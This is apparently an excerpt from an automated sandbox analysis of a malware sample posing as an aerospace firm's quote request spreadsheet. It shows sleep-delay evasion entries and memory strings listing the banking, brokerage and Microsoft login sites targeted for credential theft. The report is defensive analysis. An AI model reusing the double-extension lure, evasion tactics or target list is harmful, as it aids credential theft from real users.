Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595015s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -594797s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -594687s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -594578s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239883	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239765	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239651	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239546	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239435	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239328	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239219	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239109	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 239000	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 238883	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 238688	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 238463	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 238156	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 237989	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 237859	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 237664	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239702	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239589	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239247	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 239137	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238992	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238504	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238384	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238278	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238170	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 238047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 237935	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597465	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597234	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596575	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 596030	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 595042	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599773
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599671
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599562
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599231
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 599015
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598903
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598797
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598687
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598576
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598140
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 598031
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597922
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597703
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596822
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596491
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596346
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596108
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595997
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595890
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595671
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595125
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 594797
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 594578

Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: WheTgQY.exe, 00000009.00000002.2081548688.0000000007D63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5#
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4485070133.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2043053754.0000000007329000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003884000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WheTgQY.exe, 00000010.00000002.4500335062.0000000003BA3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
